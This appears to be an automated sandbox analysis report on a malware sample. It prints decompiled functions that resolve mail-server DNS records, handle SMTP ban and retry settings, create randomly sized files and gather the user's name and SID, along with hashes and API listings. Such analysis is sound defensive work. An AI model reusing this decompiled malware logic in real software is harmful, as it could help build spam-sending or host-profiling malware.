                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEventExitProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404124870-0
                                                                                                                                  • Opcode ID: a7245d695b6c108c1b2c14e57ed76f02bf9552f3b235e99bac8c66b9f90f9768
                                                                                                                                  • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                                                                  • Opcode Fuzzy Hash: a7245d695b6c108c1b2c14e57ed76f02bf9552f3b235e99bac8c66b9f90f9768
                                                                                                                                  • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D1B7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 241COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$__get_printf_count_output_get_int_arg_wctomb_s_write_string
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 532768033-2547889144
                                                                                                                                  • Opcode ID: c5a304928e7fc22829c34426129b93642ccf84d24fd7bf42c7d443934dd78d7e
                                                                                                                                  • Instruction ID: d0441a1c6b983311c903b277fb7f4aa63ae84449d50a9e317f732e81e7264bbf
                                                                                                                                  • Opcode Fuzzy Hash: c5a304928e7fc22829c34426129b93642ccf84d24fd7bf42c7d443934dd78d7e
                                                                                                                                  • Instruction Fuzzy Hash: 85A17EB0E012288BDF24DF55DC89BEEB7B0AB44305F6481DAE4197B281D7789E80CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0041500D Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 166COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __hextodec__inc__un_inc_isdigit_isxdigit
                                                                                                                                  • String ID: 8$F$o
                                                                                                                                  • API String ID: 245833041-550588462
                                                                                                                                  • Opcode ID: 46d235cddeeffa35f8f244a97450778168b5dffc4dab6483bc8664cefa99a91a
                                                                                                                                  • Instruction ID: 2e5843cf0efdca669e14db03ce57f9015b289e99c6720257502155bfede8526d
                                                                                                                                  • Opcode Fuzzy Hash: 46d235cddeeffa35f8f244a97450778168b5dffc4dab6483bc8664cefa99a91a
                                                                                                                                  • Instruction Fuzzy Hash: D4718FB0D05659DBCF25CF64C8943EEBB70AF95308F2481DBD8296B242D2799AC1CF49
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402D21 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85memorylibrarystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                  			E00402D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_push(_t39);
					_t35 =  &_v16;
					_push( &_v16);
					_push(_t39);
					_push(_t39);
					_push(0xf);
					_push(_a4);
					if( *_t20() != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0040EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}














                                                                                                                                  0x00402d31
                                                                                                                                  0x00402d32
                                                                                                                                  0x00402d33
                                                                                                                                  0x00402d39
                                                                                                                                  0x00402d3a
                                                                                                                                  0x00402d40
                                                                                                                                  0x00402d44
                                                                                                                                  0x00402d5b
                                                                                                                                  0x00402d61
                                                                                                                                  0x00402d69
                                                                                                                                  0x00402d54
                                                                                                                                  0x00000000
                                                                                                                                  0x00402d54
                                                                                                                                  0x00402d6b
                                                                                                                                  0x00402d6c
                                                                                                                                  0x00402d6f
                                                                                                                                  0x00402d70
                                                                                                                                  0x00402d71
                                                                                                                                  0x00402d72
                                                                                                                                  0x00402d74
                                                                                                                                  0x00402d7b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402d7d
                                                                                                                                  0x00402d80
                                                                                                                                  0x00402d83
                                                                                                                                  0x00402d88
                                                                                                                                  0x00402deb
                                                                                                                                  0x00000000
                                                                                                                                  0x00402deb
                                                                                                                                  0x00402d90
                                                                                                                                  0x00402d95
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402da6
                                                                                                                                  0x00402daa
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402db0
                                                                                                                                  0x00402db9
                                                                                                                                  0x00402dc1
                                                                                                                                  0x00402dc7
                                                                                                                                  0x00402dcb
                                                                                                                                  0x00402dd1
                                                                                                                                  0x00402dd4
                                                                                                                                  0x00402dd9
                                                                                                                                  0x00402de0
                                                                                                                                  0x00402ddb
                                                                                                                                  0x00402ddb
                                                                                                                                  0x00402ddb
                                                                                                                                  0x00402de2
                                                                                                                                  0x00402de2
                                                                                                                                  0x00402de4
                                                                                                                                  0x00402de6
                                                                                                                                  0x00000000
                                                                                                                                  0x00402dea
                                                                                                                                  0x00402d4a
                                                                                                                                  0x00402d52
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                                                                  • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                                                                  • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                  • API String ID: 3560063639-3847274415
                                                                                                                                  • Opcode ID: 5e2bf11e9834445352213f4299fb31fa0ce6085a410f2f30f40d5b35f0e3f35c
                                                                                                                                  • Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
                                                                                                                                  • Opcode Fuzzy Hash: 5e2bf11e9834445352213f4299fb31fa0ce6085a410f2f30f40d5b35f0e3f35c
                                                                                                                                  • Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040BE31 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 152stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0040BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
								_t51 = 0x413638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x413634;
							}
						} else {
							_t51 = 0x413630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0040EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0040EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0040EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0040EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0040EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

























                                                                                                                                  0x0040be40
                                                                                                                                  0x0040be43
                                                                                                                                  0x0040be4c
                                                                                                                                  0x0040be53
                                                                                                                                  0x0040be71
                                                                                                                                  0x0040be71
                                                                                                                                  0x0040be77
                                                                                                                                  0x0040be7a
                                                                                                                                  0x0040bf62
                                                                                                                                  0x0040bf6e
                                                                                                                                  0x0040bf83
                                                                                                                                  0x0040bf94
                                                                                                                                  0x0040bf98
                                                                                                                                  0x0040bf9d
                                                                                                                                  0x0040bf9f
                                                                                                                                  0x0040bf9f
                                                                                                                                  0x0040bf85
                                                                                                                                  0x0040bf85
                                                                                                                                  0x0040bf85
                                                                                                                                  0x0040bf70
                                                                                                                                  0x0040bf70
                                                                                                                                  0x0040bf70
                                                                                                                                  0x0040bfa2
                                                                                                                                  0x0040bfa7
                                                                                                                                  0x0040bfab
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bfad
                                                                                                                                  0x0040bfad
                                                                                                                                  0x0040bfaf
                                                                                                                                  0x0040bfbe
                                                                                                                                  0x0040bfb4
                                                                                                                                  0x0040bfb9
                                                                                                                                  0x0040bfba
                                                                                                                                  0x0040bfbd
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bfc8
                                                                                                                                  0x0040bfab
                                                                                                                                  0x0040be80
                                                                                                                                  0x0040be83
                                                                                                                                  0x0040be87
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be8d
                                                                                                                                  0x0040be8d
                                                                                                                                  0x0040be92
                                                                                                                                  0x0040be9b
                                                                                                                                  0x0040be9b
                                                                                                                                  0x0040be9c
                                                                                                                                  0x0040be9d
                                                                                                                                  0x0040bea3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bea9
                                                                                                                                  0x0040beb1
                                                                                                                                  0x0040beb6
                                                                                                                                  0x0040beb7
                                                                                                                                  0x0040bebc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bec6
                                                                                                                                  0x0040becb
                                                                                                                                  0x0040bece
                                                                                                                                  0x0040bed2
                                                                                                                                  0x0040bed6
                                                                                                                                  0x0040bedb
                                                                                                                                  0x0040bee1
                                                                                                                                  0x0040bee4
                                                                                                                                  0x0040bee7
                                                                                                                                  0x0040beee
                                                                                                                                  0x0040bef9
                                                                                                                                  0x0040beff
                                                                                                                                  0x0040bf01
                                                                                                                                  0x0040bf01
                                                                                                                                  0x0040bf02
                                                                                                                                  0x0040bf06
                                                                                                                                  0x0040bf0c
                                                                                                                                  0x0040bf10
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bf12
                                                                                                                                  0x0040bf1c
                                                                                                                                  0x0040bf23
                                                                                                                                  0x0040bf26
                                                                                                                                  0x0040bf2c
                                                                                                                                  0x0040bf30
                                                                                                                                  0x0040bf30
                                                                                                                                  0x0040bf37
                                                                                                                                  0x0040bf39
                                                                                                                                  0x0040bf39
                                                                                                                                  0x0040bf37
                                                                                                                                  0x0040bf49
                                                                                                                                  0x0040bf4c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bf4c
                                                                                                                                  0x0040bf10
                                                                                                                                  0x0040bf4f
                                                                                                                                  0x0040bf4f
                                                                                                                                  0x0040bf52
                                                                                                                                  0x0040bf55
                                                                                                                                  0x0040bf5a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be61
                                                                                                                                  0x0040be67
                                                                                                                                  0x0040be6b
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be6b

                                                                                                                                  APIs
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID: smtp_ban$smtp_herr$smtp_retr
                                                                                                                                  • API String ID: 1586166983-1625972887
                                                                                                                                  • Opcode ID: 88ba16253c7691906bbedd67b16b2fe6c1723edfc6ca7cf3586db77342e9cac5
                                                                                                                                  • Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
                                                                                                                                  • Opcode Fuzzy Hash: 88ba16253c7691906bbedd67b16b2fe6c1723edfc6ca7cf3586db77342e9cac5
                                                                                                                                  • Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406A60 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x412180 = 0x5e0d0101;
					 *0x41217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				if(GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32) == 0) {
					L10:
					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63);
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = CloseHandle(_v12);
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x412180 = 0x5e0d0103;
						 *0x41217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x412180 = 0x5e0d0102;
					 *0x41217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}





















                                                                                                                                  0x00406a60
                                                                                                                                  0x00406a68
                                                                                                                                  0x00406a7d
                                                                                                                                  0x00406a83
                                                                                                                                  0x00406a89
                                                                                                                                  0x00406b8c
                                                                                                                                  0x00406b9c
                                                                                                                                  0x00406ba1
                                                                                                                                  0x00000000
                                                                                                                                  0x00406ba1
                                                                                                                                  0x00406a91
                                                                                                                                  0x00406a97
                                                                                                                                  0x00406a9e
                                                                                                                                  0x00406aa1
                                                                                                                                  0x00406ab8
                                                                                                                                  0x00406ac3
                                                                                                                                  0x00406b1d
                                                                                                                                  0x00406b27
                                                                                                                                  0x00406b2f
                                                                                                                                  0x00406b34
                                                                                                                                  0x00406b5f
                                                                                                                                  0x00406b61
                                                                                                                                  0x00406b63
                                                                                                                                  0x00406b86
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b89
                                                                                                                                  0x00406b65
                                                                                                                                  0x00406b78
                                                                                                                                  0x00406b7d
                                                                                                                                  0x00406b7f
                                                                                                                                  0x00406b80
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b80
                                                                                                                                  0x00406b36
                                                                                                                                  0x00406b49
                                                                                                                                  0x00406b4e
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b4e
                                                                                                                                  0x00406ad2
                                                                                                                                  0x00406ad7
                                                                                                                                  0x00406ada
                                                                                                                                  0x00406adc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406ade
                                                                                                                                  0x00406af5
                                                                                                                                  0x00406af5
                                                                                                                                  0x00000000
                                                                                                                                  0x00406afd
                                                                                                                                  0x00406afd
                                                                                                                                  0x00406aff
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b01
                                                                                                                                  0x00406b0a
                                                                                                                                  0x00406b17
                                                                                                                                  0x00406b17
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b17
                                                                                                                                  0x00406b03
                                                                                                                                  0x00406b08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b08

                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,761F81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00409E9D,00409A60,?,?,?,004122F8,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
                                                                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188212458-0
                                                                                                                                  • Opcode ID: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
                                                                                                                                  • Instruction ID: 11eff480047975ec65ad8f821bd7964ca9f9c490359b1bf2623e7d0ea65c751f
                                                                                                                                  • Opcode Fuzzy Hash: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
                                                                                                                                  • Instruction Fuzzy Hash: 2631F1B2900208BFDB00DFA09D44ADF7F79EF48310F158076E212F7291D674A9658F69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D005 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$_get_int_arg_wctomb_s_write_string
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 557302112-2547889144
                                                                                                                                  • Opcode ID: f99934b454a3d1bf400a84925ce5597834dedd02fc1dc8bff83ec1b1b6f9b803
                                                                                                                                  • Instruction ID: 77bf603594803d1c9b5e79f1d2728a729673d1f5d1a9e691231cf89a20a4aa33
                                                                                                                                  • Opcode Fuzzy Hash: f99934b454a3d1bf400a84925ce5597834dedd02fc1dc8bff83ec1b1b6f9b803
                                                                                                                                  • Instruction Fuzzy Hash: 14A17CB4E012288FDB24CF54DC89BEEB7B0AB48305F5481DAE4196B291D6789E80CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406F5F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E00406F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;
				_v12 = 0x80;
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
					return _a8;
				}
				E0040EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0040F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);
				goto L8;
			}

















                                                                                                                                  0x00406f6c
                                                                                                                                  0x00406f77
                                                                                                                                  0x00406f82
                                                                                                                                  0x00000000
                                                                                                                                  0x00407047
                                                                                                                                  0x00406f88
                                                                                                                                  0x00406f8a
                                                                                                                                  0x00406f8d
                                                                                                                                  0x00406f8d
                                                                                                                                  0x00406f8f
                                                                                                                                  0x00406f90
                                                                                                                                  0x00406f96
                                                                                                                                  0x00406fb3
                                                                                                                                  0x00406fba
                                                                                                                                  0x00406fc9
                                                                                                                                  0x00407025
                                                                                                                                  0x0040703f
                                                                                                                                  0x00000000
                                                                                                                                  0x00407042
                                                                                                                                  0x00406fd6
                                                                                                                                  0x00406fdb
                                                                                                                                  0x00406fe3
                                                                                                                                  0x00406fe4
                                                                                                                                  0x00406fe7
                                                                                                                                  0x00406fe8
                                                                                                                                  0x00406fef
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406ff1
                                                                                                                                  0x00406ff4
                                                                                                                                  0x00406ff4
                                                                                                                                  0x00406ff7
                                                                                                                                  0x00406ff7
                                                                                                                                  0x00406ff9
                                                                                                                                  0x00406ffa
                                                                                                                                  0x00407000
                                                                                                                                  0x0040700e
                                                                                                                                  0x00407016
                                                                                                                                  0x00407019
                                                                                                                                  0x0040701f
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
                                                                                                                                  • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
                                                                                                                                  • LocalFree.KERNEL32(00000120), ref: 0040701F
                                                                                                                                  • wsprintfA.USER32 ref: 00407036
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
